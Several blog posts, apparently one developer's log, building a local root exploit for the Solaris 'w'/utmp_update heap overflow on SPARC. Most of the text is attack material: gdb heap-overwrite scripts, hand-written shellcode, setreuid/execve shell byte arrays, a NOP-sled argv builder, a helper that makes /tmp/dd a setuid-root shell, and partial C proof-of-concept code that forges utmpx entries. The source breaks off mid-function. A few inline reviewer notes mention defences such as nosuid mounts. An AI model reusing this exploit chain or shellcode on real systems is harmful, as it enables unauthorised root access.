Bazz's Code Developments

NX-stack bypass w(1) Local Root Exploit Realization <3 - Pt. 19

Woo-Hoo. I’m finally ready to release source code :D


Posted in Asm, buffer overflow, C, NameFS, Sparc/Solaris

Heap-Based Execution from UTMPX entries – Pt. 17

set *0x31488=0x00000000  # null bytes from LINE
set *0x31490=0x00000000  # null bytes from LINE 
## above, the parent MUST be NULL
## the first word is NULL and is OK as a chunk size.
## Below, left points to LD's thr_jmp_table - 8 bytes
set *0x31498=0xff3ee260
## this is the ut_pid

## this below is a 'special'
## I can only control the top 4 bytes of the address
## A value is written in this address + 8
## There is a writable memory segment @ 0xff3f0000, so I use it at risk.
## This could be turned into a riskless thing by pointing it to the stack,
## and using ARGV as a way to lengthen the stack greatly, I can point
## this address into the "landing zone" created by a long ARGV
## but I'm not going to bother ..
## this 0xff3f is set by modifying utmpx: ut_exit.e_exit = 0xff3f
set *0x314a0=0xff3f17a8
### And finally the ACTUAL RETURN ADDRESS :D no +/-
set *0x314a8=0xffbff090
# ut_tv.tv_usec



# MUST CALL 'w' with -h to avoid smalloc
# NEW LIFE
# FOR GDB HEAP EXECUTION!! WOOT!! 
set *(0x31488-0x178)=0x00000000
set *(0x31490-0x178)=0x00000000
set *(0x31498-0x178)=0xff3de22c
set *(0x314a0-0x178)=0xff3f17a8
set *(0x314a8-0x178)=0xffbef090
b t_delete

there’s only enough room in the name[32] field for 28-4 = 24 bytes of ‘authentic’ asm instructions, followed by the 8 necessary for the call / branch instruction.
What’s the difference between a call and a branch instruction? I think it is that call places the return address into %o7. It may be possible to get 28 bytes by using some kind of annulled unconditional branch instruction: yes, a branch-always with the annul bit set, i.e. ba,a


Posted in Asm, GDB, Sparc/Solaris

Race Condition SHMACE ShmUh’SMISION – pt. 16

WELL WELL WELL. I’m getting the shell.. but what’s this!?! As user .. “DAEMON!??!” UID of 1 ???

I thought to myself WTF.. So I tried touching a file.. this is the code I’m using to do that:

! SPARC test stub (Solaris, trap 8 = system call, number in %g1).
! Builds a short path string on the stack, issues system call 5 on it,
! then system call 1. The gdb dump of __open later on this page shows
! call number 5 is open; the author's own note marks call 1 as exit(0).
! Observable result per the ls output below: a root-owned file "dd" in /tmp.
.globl main
main:
! # /bin/bash = 2f62696e 2f626173 6800
! # /tmp/dd = 2f746d70 2f646500
set 0x2f746d70, %o0             ! bytes "/tmp"
st %o0, [%sp+84]                ! path[0..3]
! %hi() keeps only the upper 22 bits, so the word stored next is
! 0x2f646400 ("/dd" + NUL), not the 0x2f646500 written in the operand.
sethi %hi(0x2f646500), %o0
st %o0, [%sp+88]                ! path[4..7]
!mov 0x100, %o1
mov 0x1, %o1
sll %o1, 8, %o1                 ! %o1 = 0x100, same value as the commented-out mov
                                ! presumably the open() flags word (0x100 is O_CREAT in Solaris headers) - confirm
!or %o1, %o0, %o0
add %sp, 84, %o0                ! %o0 = address of the path string
                                ! nothing in this block sets %o2, the third argument register
mov  5, %g1     ! 0x5
ta 8
!ta 8
! addition to prevent illegal instruction failure
xor %o5,%o5,%o0                 ! %o0 = 0 (status argument for the call below)
!add %o1,%o1,%o0
! interprets as end of string!! even without null byte ! and o1, 2, %o0         ! exit(0)
mov     1, %g1
ta      8
$ ls -l /tmp
----------   1 root     staff          0 Nov  5 21:02 dd

So I definitely have root privilege when my shellcode is executed.. So what’s the deal?? Why can’t I start a shell properly???

I have decided to copy a shell into the file /tmp/dd, which I will have my shellcode turn into a suid root shell :)

#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

/*
 * Helper program: hand /tmp/dd to uid 0 / gid 0, then set mode 04777
 * (setuid bit plus rwx for owner, group and other). The return values of
 * chown() and chmod() are not checked. The gdb dump that follows shows the
 * two raw system calls this compiles to, which the author then lifts into
 * hand-written assembly.
 *
 * Reviewer note: the on-disk artifact of this step is a setuid-root,
 * world-writable file under /tmp. Setuid files in world-writable
 * directories are cheap to audit for, and mounting /tmp nosuid makes the
 * bit inert.
 */
main()
{
  char str[] = "/tmp/dd";

  // int chown(const char *path, uid_t owner, gid_t group)
  chown (str, 0, 0);
  // int chmod(const char *path, mode_t mode);
  // 04777 is the 0x9ff immediate seen in the disassembly below
  chmod (str, 04777);
}
0x00010234 <main+0>:    save  %sp, -112, %sp
0x00010238 <main+4>:    sethi  %hi(0x17800), %g1
0x0001023c <main+8>:    or  %g1, 0x138, %o0     ! 0x17938
0x00010240 <main+12>:   clr  %o1
0x00010244 <main+16>:   clr  %o2
0x00010248 <main+20>:   call  0x10838 <chown>
0x0001024c <main+24>:   nop
0x00010250 <main+28>:   sethi  %hi(0x17800), %g1
0x00010254 <main+32>:   or  %g1, 0x138, %o0     ! 0x17938
0x00010258 <main+36>:   mov  0x9ff, %o1
0x0001025c <main+40>:   call  0x10814 <chmod>
0x00010260 <main+44>:   nop
0x00010264 <main+48>:   restore
0x00010268 <main+52>:   retl
0x0001026c <main+56>:   nop
End of assembler dump.
(gdb) disas chown
Dump of assembler code for function chown:
0x00010838 <chown+0>:   mov  0x10, %g1
0x0001083c <chown+4>:   ta  8
0x00010840 <chown+8>:   bcc  0x10854 <chown+28>
0x00010844 <chown+12>:  sethi  %hi(0x17000), %o5
0x00010848 <chown+16>:  or  %o5, 0x3c, %o5      ! 0x1703c <_cerror>
0x0001084c <chown+20>:  jmp  %o5
0x00010850 <chown+24>:  nop
0x00010854 <chown+28>:  retl
0x00010858 <chown+32>:  mov  %g0, %o0
End of assembler dump.
(gdb) disas chmod
Dump of assembler code for function chmod:
0x00010814 <chmod+0>:   mov  0xf, %g1   ! 0xf
0x00010818 <chmod+4>:   ta  8
0x0001081c <chmod+8>:   bcc  0x10830 <chmod+28>
0x00010820 <chmod+12>:  sethi  %hi(0x17000), %o5
0x00010824 <chmod+16>:  or  %o5, 0x3c, %o5      ! 0x1703c <_cerror>
0x00010828 <chmod+20>:  jmp  %o5
0x0001082c <chmod+24>:  nop
0x00010830 <chmod+28>:  retl
0x00010834 <chmod+32>:  mov  %g0, %o0
End of assembler dump.
(gdb)

chown/chmod /tmp/dd ASM for SC

! Hand-written equivalent of the chown()/chmod() C helper above, using the
! raw system call numbers read from the gdb dumps of chown (0x10) and
! chmod (0xf). Sequence: build "/tmp/dd" on the stack, chown(path, 0, 0),
! chmod(path, 0x9ff), then system call 1 with %o0 = 0.
! Neither call's carry-flag error indication is tested here (the libc
! wrappers in the dump branch on it with bcc).
! Reviewer note: what this leaves behind is a setuid-root file in /tmp;
! auditing world-writable directories for setuid files catches it, and a
! nosuid mount on /tmp makes the bit ineffective.
.globl main
main:
! # /tmp/dd = 2f746d70 2f646500
set 0x2f746d70, %o0             ! bytes "/tmp"
st %o0, [%sp+84]
! %hi() drops the low 10 bits: the stored word is 0x2f646400 ("/dd" + NUL)
sethi %hi(0x2f646500), %o0
st %o0, [%sp+88]
clr [%sp+92]                    ! zero the following word as well


!put pointer to string into $o0
add %sp,84,%o0
xor %l1, %l1, %o1               ! owner argument = 0
xor %l1, %l1, %o2               ! group argument = 0
 !call  0x10838 <chown>
 ! for function chown:
 mov  0x10, %g1
 ta  8
 
!put pointer to string into $o0
add %sp,84,%o0                  ! reloaded: %o0 holds the result of the previous call
 mov  0x9ff, %o1                ! mode 04777 (setuid + rwxrwxrwx)
! call  0x10814 <chmod>
! nop
mov  0xf, %g1   ! 0xf
ta  8

! addition to prevent illegal instruction failure
xor %o5,%o5,%o0                 ! %o0 = 0
!add %o1,%o1,%o0
! interprets as end of string!! even without null byte ! and o1, 2, %o0         ! exit(0)
!mov    1, %g1
add %g0, 1, %g1                 ! %g1 = 1, same value as the commented-out mov
ta      8
-bash-3.2$ vi opentty.c
"opentty.c" 6 lines, 64 characters

#include <fcntl.h>
main()
{
  close(0);
  open("/dev/tty", O_RDWR);
  getchar();
}
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
"opentty.c" 8 lines, 84 characters
-bash-3.2$ gcc opentty.c
-bash-3.2$ ./a.out
l
-bash-3.2$ gcc -static opentty.c
-bash-3.2$ gdb a.out
GNU gdb 6.6
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.8"...
(no debugging symbols found)
(gdb) disas main
Dump of assembler code for function main:
0x00010238 <main+0>:    save  %sp, -112, %sp
0x0001023c <main+4>:    clr  %o0
0x00010240 <main+8>:    call  0x1234c <close>
0x00010244 <main+12>:   nop
0x00010248 <main+16>:   sethi  %hi(0x39000), %g1
0x0001024c <main+20>:   or  %g1, 0x3a8, %o0     ! 0x393a8
0x00010250 <main+24>:   mov  2, %o1
0x00010254 <main+28>:   call  0x123b0 <open>
0x00010258 <main+32>:   nop
0x0001025c <main+36>:   call  0x10814 <getchar>
0x00010260 <main+40>:   nop
0x00010264 <main+44>:   restore
0x00010268 <main+48>:   retl
0x0001026c <main+52>:   nop
End of assembler dump.
(gdb) disas close
Dump of assembler code for function close:
0x0001234c <close+0>:   sethi  %hi(0x52400), %g1
0x00012350 <close+4>:   add  %g1, 0x180, %g1    ! 0x52580 <ti_jmp_table+236>
0x00012354 <close+8>:   ld  [ %g1 ], %g1
0x00012358 <close+12>:  jmp  %g1
0x0001235c <close+16>:  nop
End of assembler dump.
(gdb) disas _close
Dump of assembler code for function _private_close:
0x0001776c <_private_close+0>:  mov  6, %g1
0x00017770 <_private_close+4>:  ta  8
0x00017774 <_private_close+8>:  bcc  0x17788 <_private_close+28>
0x00017778 <_private_close+12>: sethi  %hi(0x18800), %o5
0x0001777c <_private_close+16>: or  %o5, 0x360, %o5     ! 0x18b60 <_cerror>
0x00017780 <_private_close+20>: jmp  %o5
0x00017784 <_private_close+24>: nop
0x00017788 <_private_close+28>: retl
0x0001778c <_private_close+32>: mov  %g0, %o0
End of assembler dump.
(gdb) b main
Breakpoint 1 at 0x1023c
(gdb) r
Starting program: /tmp/a.out

Breakpoint 1, 0x0001023c in main ()
(gdb) si
0x00010240 in main ()
(gdb)
0x00010244 in main ()
(gdb)
0x0001234c in close ()
(gdb)
0x00012350 in close ()
(gdb)
0x00012354 in close ()
(gdb)
0x00012358 in close ()
(gdb)
0x0001235c in close ()
(gdb)
0x0001776c in _private_close ()
(gdb) disas open
Dump of assembler code for function open:
0x000123b0 <open+0>:    sethi  %hi(0x52400), %g1
0x000123b4 <open+4>:    add  %g1, 0x194, %g1    ! 0x52594 <ti_jmp_table+256>
0x000123b8 <open+8>:    ld  [ %g1 ], %g1
0x000123bc <open+12>:   jmp  %g1
0x000123c0 <open+16>:   nop
End of assembler dump.
(gdb) disas _open
Dump of assembler code for function _open:
0x000151a8 <_open+0>:   save  %sp, -96, %sp
0x000151ac <_open+4>:   mov  %i0, %o0
0x000151b0 <_open+8>:   mov  %i1, %o1
0x000151b4 <_open+12>:  call  0x1790c <__open>
0x000151b8 <_open+16>:  mov  %i2, %o2
0x000151bc <_open+20>:  sethi  %hi(0x52800), %o1
0x000151c0 <_open+24>:  ld  [ %o1 + 0x1d8 ], %o1        ! 0x529d8 <__xpg4>
0x000151c4 <_open+28>:  cmp  %o1, 1
0x000151c8 <_open+32>:  bne  0x151f8 <_open+80>
0x000151cc <_open+36>:  mov  %o0, %i0
0x000151d0 <_open+40>:  cmp  %o0, -1
0x000151d4 <_open+44>:  be  0x151f8 <_open+80>
0x000151d8 <_open+48>:  nop
0x000151dc <_open+52>:  call  0x15258 <isptsfd>
0x000151e0 <_open+56>:  nop
0x000151e4 <_open+60>:  tst  %o0
0x000151e8 <_open+64>:  be  0x151f8 <_open+80>
0x000151ec <_open+68>:  nop
0x000151f0 <_open+72>:  call  0x153b4 <push_module>
0x000151f4 <_open+76>:  mov  %i0, %o0
0x000151f8 <_open+80>:  ret
0x000151fc <_open+84>:  restore
End of assembler dump.
(gdb) disas __open
Dump of assembler code for function __open:
0x0001790c <__open+0>:  mov  5, %g1     ! 0x5
0x00017910 <__open+4>:  ta  8
0x00017914 <__open+8>:  bcc  0x17928 <__open+28>
0x00017918 <__open+12>: sethi  %hi(0x18800), %o5
0x0001791c <__open+16>: or  %o5, 0x360, %o5     ! 0x18b60 <_cerror>
0x00017920 <__open+20>: jmp  %o5
0x00017924 <__open+24>: nop
0x00017928 <__open+28>: retl
0x0001792c <__open+32>: nop
End of assembler dump.
(gdb) b *0x00010254
Breakpoint 2 at 0x10254
(gdb) c
Continuing.

Breakpoint 2, 0x00010254 in main ()
(gdb) x/s $o0
0x393a8:         "/dev/tty"
(gdb)
/*
 * Sets the process uid to 7343, then runs /bin/bash through system().
 * The return value of setuid() is not checked, so the shell starts even if
 * the uid change failed. The page gives no further context for this snippet.
 */
main()
{
  setuid(7343);
  system("/bin/bash");
}
Posted in Uncategorized

Race Condition Determination – Pt. 15

UP
-bash-3.00$ printf "^[[A" | od -X
0000000 1b5b41
0000003
DOWN
-bash-3.00$ printf "^[[B" | od -X
0000000 1b5b42

LEFT
-bash-3.00$ printf "^[[D" | od -t x1
0000000 1b 5b 44
0000003

RIGHT
-bash-3.00$ printf "^[[C" | od -t x1
0000000 1b 5b 43
0000003

It appears to be a blind race!?!? :[ But it is NOT so. There is a way to determine where my cool cat program IS in the race!! By adding the overflow entry as a USER_PROCESS entry, it can be determined by the output whether the insertion is happening BEFORE or AFTER the forked ‘w’ process loads all entries. If we are too early, the entry will show up in w’s output; too late, and it won’t show up at all. The problem is that there is another factor — the file size of UTMPX increases by a good 0x174 * 2 bytes every test run, meaning that the metrics are inaccurate to a degree. The relation between the metrics and the file size increase is unknown.

There are many things to do:

1) Modify program to fork a PTY, this code can be extracted from Apply-hack and will be used to provide the same master-level real-time control of variables such as UP/DOWN/LEFT/RIGHT to control sleep dials before the utmpx-entry write and exec ‘w’ .

2) It may help to add a number of processes that do nothing but chew up CPU.. Try 100 processes that do nothing but echo “DADADA” to the screen.. This can prolly be done in a bash script, no?

script.sh

#!/bin/bash
# Endless loop that prints one fixed line. The post proposes running many
# copies of this purely to keep the CPU busy during the timing experiments.
# There is no exit condition: the process runs until it is killed.
while :
do
  echo "I'm a big penis short and stout. Here is and mose and here os myplas"
done

script2.sh

#!/bin/bash
# Start $1 background copies of ./script.sh (expected in the current directory).
# $1 is not validated; it must be a positive integer.
# The background jobs are never waited for or stopped by this script.
for (( c=1; c<=$1; c++ ))
do
   ./script.sh &
done
Posted in Uncategorized

Possible Circumvention — Pt. 14

In t_delete

/* make op the root of the tree */
if (PARENT(op))
t_splay(op);

make the parent point to another entry before in the heap…
this is a entry/shellcode starter..

entry/shellcode (pp) starter format:
SIZE(PP) is the first 8 bytes of shellcode,
which will have to jump to another entry before/after it which is more full of shellcode.. This jumping may have to occur through > 2 entries..

PARENT is NULL HOPEFULLY.. see if it can be placed in such a way that LEFT(PP) == tp [tp is the child] and PARENT is NULL.

This can be done at ut_tv.tv_sec and going downwards (see d4.c)

p[0x44] = 0xde
p[0x45] = 0xad
p[0x46] = 0xbe
p[0x47] = 0xef
p[0x48] = 0x0
p[0x49] = 0x8
p[0x4a] = 0xde
p[0x4b] = 0xad
p[0x4c] = 0xbe
p[0x4d] = 0xef
p[0x4e] = 0x0
p[0x4f] = 0x0
p[0x50] = 0xde
p[0x51] = 0xad
p[0x52] = 0xbe
p[0x53] = 0x1f

LEFT can be assigned to TP where it says 0xdeadbeef

t_splay is called



Long story short, I figured it out. Heap-based execution is possible in this 32-bit application, I haven’t yet discovered the puzzle piece for 64-bit application. :|
I had to find an interesting way to work through the t_delete() function. I also messed with t_splay() first but it wasn’t fruitful because it overwrites a TREE structure’s size field which is a NONO. You can’t have an asm instruction for the size field because it “breaks” something about the chunk size incompatibility… So I found a crucial stage if parent == NULL && left logic (that’s summarized, not the actual liner in the code), that gets me the ability to over-write a !SIZE member of the TREE structure, exactly a place I can begin execution from..

.

I’ve also been working around the clock on bringing up my C-based exploit. It’s stack-execution-based. :D
Here’s a current snippet (lol)..

/* This is Bazz's PoC 
 of the CVE-Blah-Blah-Blah
 of the w/whodo flaw!! <3 

*/

#include <sys/wait.h>
// copied from w
#include <stdio.h>
#include <strings.h>
#include <string.h>
#include <stdarg.h>
#include <stdlib.h>
#include <ctype.h>
#include <fcntl.h>
#include <time.h>
#include <errno.h>
#include <sys/types.h>
#include <utmpx.h>
#include <sys/stat.h>
#include <dirent.h>
#include <procfs.h>   /* /proc header file */
#include <locale.h>
#include <unistd.h>
#include <sys/loadavg.h>
#include <limits.h>
//
// my own includes
#include <sys/types.h>
#include <assert.h>

#define ERR   (-1)

 /* The program can be broken into a couple sections so far :

 1) ARGV builder to w.. Builds the argument to 'w' invocation
    so that there is a sweet amount of space to return to into the sack
 2) UTMPX FuckING WITH SHIT!
*/

/* ARGV supplement to 'W'
# first char cannot be a number (as arg to w)
printf "AAAA"
perl -e 'print "\xa4\x1c\x40\x11\x20\xbf\xff\xff"x50000'
cat asmshell7.bin
# execute @ 0xffbee008

*/
#define COOL_NOP "\xa4\x1c\x40\x11\x20\xbf\xff\xff"
// asmshell7.bin, located only on LIFE right now
//
//
char setreuid_code[]=
"\x90\x1d\xc0\x17"
"\x92\x1d\xc0\x17"
"\x82\x10\x20\xca"
"\x91\xd0\x20\x08";

char gimme_root_shell[] = 
"\x11\x0b\xd8\x9a"
"\x90\x12\x21\x6e\xd0\x23\xa0\x54\x11\x0b\xdc\xda\xd0\x23\xa0\x58"
"\x11\x0b\x5c\xc0\xd0\x23\xa0\x5c\xc0\x23\xa0\x60\x90\x03\xa0\x54"
"\xd0\x23\xa0\x48\x90\x03\xa0\x5c\xd0\x23\xa0\x4c\xc0\x23\xa0\x50"
"\x90\x03\xa0\x54\x92\x03\xa0\x48\x94\x1b\x40\x0d\x82\x10\x20\x3b"
"\x91\xd0\x20\x08\x90\x1b\x40\x0d\x82\x10\x20\x01\x91\xd0\x20\x08";

// be global, since we'll be calling the child exec many times
// potentially, who cares 
char argv_buf[(50000*8)+4+96+1]; // 96 is sizeof gimme_root_shell, 4 for "AAAA"

// this will build the argv supply and return a pointer to it :) 
/*
 * Fill the global argv_buf and return it.
 *
 * Layout written, in order: four 'A' bytes, 50000 copies of the 8-byte
 * COOL_NOP sequence, then setreuid_code, then gimme_root_shell.
 *
 * Returns: argv_buf. It is a global, so every call rebuilds the same
 * storage and earlier return values alias the new contents.
 *
 * NOTE(review): every copy is an unbounded strcpy() into a fixed-size
 * global, and the size expression is repeated from the declaration instead
 * of using sizeof argv_buf.
 */
char * build_argv_supplement()
{
  int i=0;
  char *p;

  bzero(argv_buf, (50000*8)+4+96+1);

  p = argv_buf;
  // first characters cannot be numbers so.. fill it with some A
  *(p++) = 'A';
  *(p++) = 'A';
  *(p++) = 'A';
  *(p++) = 'A';

  // 50000 back-to-back copies; p advances by the 8 bytes strcpy just wrote
  for (i=0; i < 50000; i++)
  {
    strcpy(p, COOL_NOP);
    p+=8;
  }
  strcpy (p, setreuid_code);
  p += strlen(setreuid_code);

  strcpy (p, gimme_root_shell);

  return argv_buf;
}


/* NEED MANDATORY A STRING BUILDER TO UTMP_UPDATEE */

 // To-DO 
 /* 

 Let's talk about the string builder: 
 /usr/lib/utmp_update `perl -e 'print "\xff\xff\xff\xf8" . "AAAA" . 
  "\xff\x3e\xe2\x48" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . 
  "AAAA" '` `perl -e 'print "\xff\xbe\xe0\x08" '` "pts////////2" "9000" 
  "8" "10" "1" "100000" "10000" "4" "aa" "4" "bazz"

let's strip that into components. A lot of that perl stuff can be done
programmatically in C */
#define UTMP_UPDATE_CMD_PATH "/usr/lib/utmp_update "
#define LD_COOL_ADDR 0xff3ee248
char LD_COOL_ADDR_STR[] = "\xff\x3e\xe2\x48"; // this is it - 20
#define STACK_RETURN_ADDR "\xff\xbe\xe0\x08"
/*
 Get current TTY, and use that as a component in a string builder
 of the argument to utmp_update.

 char *ttyname(int fildes);
 Upon successful completion, ttyname() and ttyname_r() return
     a pointer to a string. Otherwise, a null pointer is returned
     and errno is set to indicate the error

*/
char *ttyn; // my tty name's number
// i.e. /dev/pts/2, ttyn = "2"
craft_fake_tree_utmpx_entry(struct utmpx *utp);
char * getfree_stackreturnaddr_id();


// THIS IS IMPORTANT!! <3 
#define W_HEAPBUF_BASEADDR 0x30770
// This can be checked by debugging the program (copy it into home dir)
// and checking the return of malloc() 

/* There are 3 different kind of UTMPX entries this program makes
1) Pre-entry -- a filler entry to ensure that the TREE struct entry
    is aligned on an WORD-size boundary (8 bytes on 32-bit OS)
2) Fake TREE struct entry: 'nuff said'
    Not really. This entry's ID field IS the target address, 

32-bit TREE STRUCT
------------------
LL LL LL LL   AA AA AA AA   TP TP TP TP   AA AA AA AA
FF FF FF FF   AA AA AA AA   AA AA AA AA   AA AA AA AA
SP SP SP SP   AA AA AA AA   AA AA AA AA   AA AA AA AA
LL : lowest 2 bits must not be set.
AA : Not important
I'm not explaining TP and SP cause I already figured it out and forgot.
See Shellcoder's Handbook. 
Long story short: 
TP points to LD.so function pointer and 
SP points to Stack return address

3) Overflowed Heap chunk entry -- this just has some pointers back to
    the fake TREE struct entry.
*/
// could be STACK SPACE, could be HEAP SPACE.. IONNO
// in this PoC it's STACK SPACE 
// TREE struct ID field must be consolidated,
// create a range to consolidate against:  
#define TARGET_MIN 0xffbba000
#define TARGET_MAX 0xffbeff00
// only care about multiples of 4 (each instruction is 4 bytes)
// and I want how many bytes to use so i divide by 8, a bit for every 
// entry
#define STACK_TABLE_SIZE (((TARGET_MAX - TARGET_MIN) / 4) / 8)
//
//
stack_table[STACK_TABLE_SIZE]; // representing instructions entries from
// 0xffb0a000 - 0xffbeff00

#define UTMPX_ENTRY_SIZE sizeof (struct utmpx)

struct stat gstatbuf;
char *prog;

// keep track of which utmpx entries are "taken"
// every bit represents

//ie ENTRY "AAAA" = 0x41414141
// I can allocate a table space 32*32*32*32 bytes wide
// to represent all combinations of 4 bytes..

//0x01 should set bit 0 in the table//
// since the byte will be needed anyways, let's be reflecting
// 0x01 will be bit 1
// so just divide by 8 to find the byte index.. 
// modulus by 8 to get the bit index
//char table[32*32*32*32];
//char table[256][256][256][32];
//0x20000000 bytes = 512 MB 
// DAMN TATS TOO MUCH!! Let's lower the bitspace down to save memory..
// if disregard the first byte we get 2MB size..
// how about half the bitspace..
#define UPPER_LIMIT 16
char table[UPPER_LIMIT][256][256][32];
// this table will take 32 MB.. Not bad..
/* this table reflects entries that I will use in my attack
If the UTMPX file already has certain entries.. I need to take that
into account because UTMPX never appends to the file when the entry 
already exists.. but appending is necessary to overflow the heap
*/
/* if the First character of the ID is not in our bitspace, ignore it,
it is not part of the attack vector */
/* Reflects the ID[4] field
"AAAA"
look at them like address bits 
but how much does each one affect the whole? 
*/
#define A0 (1 << 0)
#define A1 (1 << 5)  // * 32 
#define A2 (1 << (5+8)) // * 32
#define A3 (1 << (5+8+8)) // * 32

/*

let's say the value is 0x00000041
0x41 / 8 = 8
0x41 % 8 = 1
table[8] |= 1 << 1

what if it was 0x00000141
*/



time_t utmpx_last_access_time=0; 
static char pts_prefix[] = "pts///";

/*
 * Allocate the first unused address from the stack_table bitmap.
 *
 * Each element of stack_table uses its low 8 bits; bit b of element i stands
 * for the address TARGET_MIN + i*32 + b*4. The first clear bit found is set
 * (marking the address taken) and the address is stored, as a native
 * uint32_t, into a static 5-byte buffer whose last byte stays zero.
 *
 * Returns: pointer to that static buffer, or NULL when every bit is set.
 * The buffer is shared between calls, so a later call overwrites the value.
 */
char * getfree_stackreturnaddr_id()
{
  static char addr_str[5];
  int i;
  uint8_t bit_index;

  bzero (addr_str, 5);

  for (i=0; i < STACK_TABLE_SIZE; i++)
  {
    for (bit_index=0; bit_index < 8; bit_index++)
    {
      if ( (stack_table[i] & (1 << bit_index)) == 0 )
      {
        // inverse of the mapping storeID() uses to set bits in stack_table
        uint32_t free_stack_addr = TARGET_MIN + (i * 32) + (bit_index * 4) ;
        // 4-byte store through a cast char pointer; byte order is the host's
        uint32_t *pi = (uint32_t *)&addr_str[0]; 
        *pi = free_stack_addr;
        // mark the entry taken now on
        stack_table[i] |= (1 << bit_index);
        return addr_str; // its OK, addr_str is static
      }
    }
  }

  return NULL;
}

#define GENERIC_PID 9000
#define GENERIC_TYPE DEAD_PROCESS // it has to be 08.. there's nothin GENERIC ABOUT it!! 
#define GENERIC_TERM 10
#define GENERIC_EXITSTATUS 1
#define GENERIC_XTIME 100000
#define GENERIC_TIME_USEC 10000
#define GENERIC_SESSION 4
#define GENERIC_PAD0 0xaaaa
#define GENERIC_PAD1 0xbbbb
#define GENERIC_PAD2 0xcccc
#define GENERIC_PAD3 0xdddd
#define GENERIC_PAD4 0xeeee
#define GENERIC_SYSLEN 4
#define GENERIC_HOST "bazz"
//  static char phrase6[] = "\" \"9000\" \"8\" \"10\" \"1\" \"100000\" 
// \"10000\" \"4\" \"aa\" \"4\" \"bazz\"";
/*
 * Fill the fields of *utxp that are the same for every entry this program
 * writes: ut_line ("pts///" followed by the global ttyn), pid, type, exit
 * status, times, session, pad words, syslen and host, all taken from the
 * GENERIC_* constants above.
 *
 * Does not touch ut_name or ut_id; callers set those themselves.
 * Reads the globals pts_prefix and ttyn, so necessary_init() must have set
 * ttyn first. The strcpy() calls are not length-checked against the
 * destination fields.
 */
assign_generics(struct utmpx *utxp)
{
  char *cp;
  // LINE 
  cp = utxp->ut_line;
  strcpy (cp, pts_prefix); // global
  cp += strlen(pts_prefix);
  strcpy (cp, ttyn); // global

  utxp->ut_pid = GENERIC_PID;
  utxp->ut_type = GENERIC_TYPE;
  utxp->ut_exit.e_termination = GENERIC_TERM;
  utxp->ut_exit.e_exit = GENERIC_EXITSTATUS;
  utxp->ut_xtime = GENERIC_XTIME;
  utxp->ut_tv.tv_usec = GENERIC_TIME_USEC;
  utxp->ut_session = GENERIC_SESSION;
  utxp->pad[0] = GENERIC_PAD0;
  utxp->pad[1] = GENERIC_PAD1;
  utxp->pad[2] = GENERIC_PAD2;
  utxp->pad[3] = GENERIC_PAD3;
  utxp->pad[4] = GENERIC_PAD4;
  utxp->ut_syslen = GENERIC_SYSLEN;
  strcpy(utxp->ut_host, GENERIC_HOST);
}

/*
 * Build, in memory only, the utmpx record that the comments above call the
 * "fake TREE struct entry". Nothing is written to the utmpx file here.
 *
 * utp: caller-owned record; it is zeroed first, then
 *   - ut_name receives a fixed byte pattern with LD_COOL_ADDR_STR spliced in,
 *   - ut_id receives the address handed out by getfree_stackreturnaddr_id(),
 *   - every remaining field comes from assign_generics().
 *
 * Exits the process with status 1 when no address is left in stack_table.
 */
craft_fake_tree_utmpx_entry(struct utmpx *utp)
{
  char *free_stack_id;
  char *cp; // char pointer generic
  // INSPIRATION: 
  /*static char pts[] = "pts///";

  static char phrase1[] = "/usr/lib/utmp_update `perl -e 'print \"\xff\xff\xff\xf8\" . \"AAAA\" . \"";
  // phrase 2 is the LD_COOL_ADDR_STR
  static char phrase3[] = "\" . \"AAAA\" . \"\xff\xff\xff\xff\" . \"AAAA\" . \"AAAA\" . \"AAAA\" '` ";
  static char phrase4[] = "`perl -e 'print \"\xff\xbe\xef\x08\" '` \"pts///";
  // ttynum
  static char phrase6[] = "\" \"9000\" \"8\" \"10\" \"1\" \"100000\" \"10000\" \"4\" \"aa\" \"4\" \"bazz\"";*/

  bzero (utp, UTMPX_ENTRY_SIZE);

  // NAME
  cp = utp->ut_name;
  strcpy (cp, "\xff\xff\xff\xf8XXXX" );
  cp += 8;
  strcpy (cp, LD_COOL_ADDR_STR);
  cp += strlen(LD_COOL_ADDR_STR);
  strcpy (cp, "AAAA\xff\xff\xff\xffXXXXBBBBCCCC");
  cp += 20; // cp is not read again after this point

  // ID
  if ( (free_stack_id = getfree_stackreturnaddr_id()) == NULL)
  {
    fprintf(stderr, "OUT OF FREE STACK SPACE!!?!? QUITTING\n");
    exit(1);
  }
  strcpy (utp->ut_id, free_stack_id);

  // TAKES CARE OF THE REST
  assign_generics(utp);
}

/*
 * Unfinished API-based variant: rewinds the utmpx database, reads entries
 * until getutxent() returns NULL, then crafts a record into the local `ut`.
 * The record is never passed to pututxline() in this function, so as
 * written it has no effect on the file.
 */
utmp_update_C_style()
{
  struct utmpx *utp, ut;
  reset_utmpx_file_for_querying();
  while ( (utp = getutxent()) != NULL );

  craft_fake_tree_utmpx_entry(&ut);
}


/*
 * Assemble a shell command line for /usr/lib/utmp_update in a static
 * 2048-byte buffer and return it.
 *
 * The command is the concatenation phrase1 + LD_COOL_ADDR_STR + phrase3 +
 * phrase4 + ttyn + phrase6; the binary fields are produced at run time by
 * the perl one-liners embedded in the phrases. The large commented-out
 * sections are an earlier attempt that wrote the raw bytes directly.
 *
 * Returns: pointer to the static buffer (overwritten on the next call).
 * Reads the global ttyn, which necessary_init() sets.
 *
 * Reviewer note: both callers hand this string to system(), so process
 * accounting or audit logs on the host would show a shell spawning perl
 * and /usr/lib/utmp_update with non-printable argument bytes.
 */
char * string_builder_for_utmp_update_FAKE_TREE()
{
  static char utmp_update_buf[2048];
  // I could update UTMPX through the API
  // but I'm not in that mindset!! <3 
  char *p;
  static char pts_prefix[] = "pts///"; // shadows the file-level pts_prefix; not used below

  static char phrase1[] = "/usr/lib/utmp_update `perl -e 'print \"\xff\xff\xff\xf8\" . \"AAAA\" . \"";
  // phrase 2 is the LD_COOL_ADDR_STR
  static char phrase3[] = "\" . \"AAAA\" . \"\xff\xff\xff\xff\" . \"AAAA\" . \"AAAA\" . \"AAAA\" '` ";
  static char phrase4[] = "`perl -e 'print \"\xff\xbe\xef\x08\" '` \"pts///";
  // ttynum
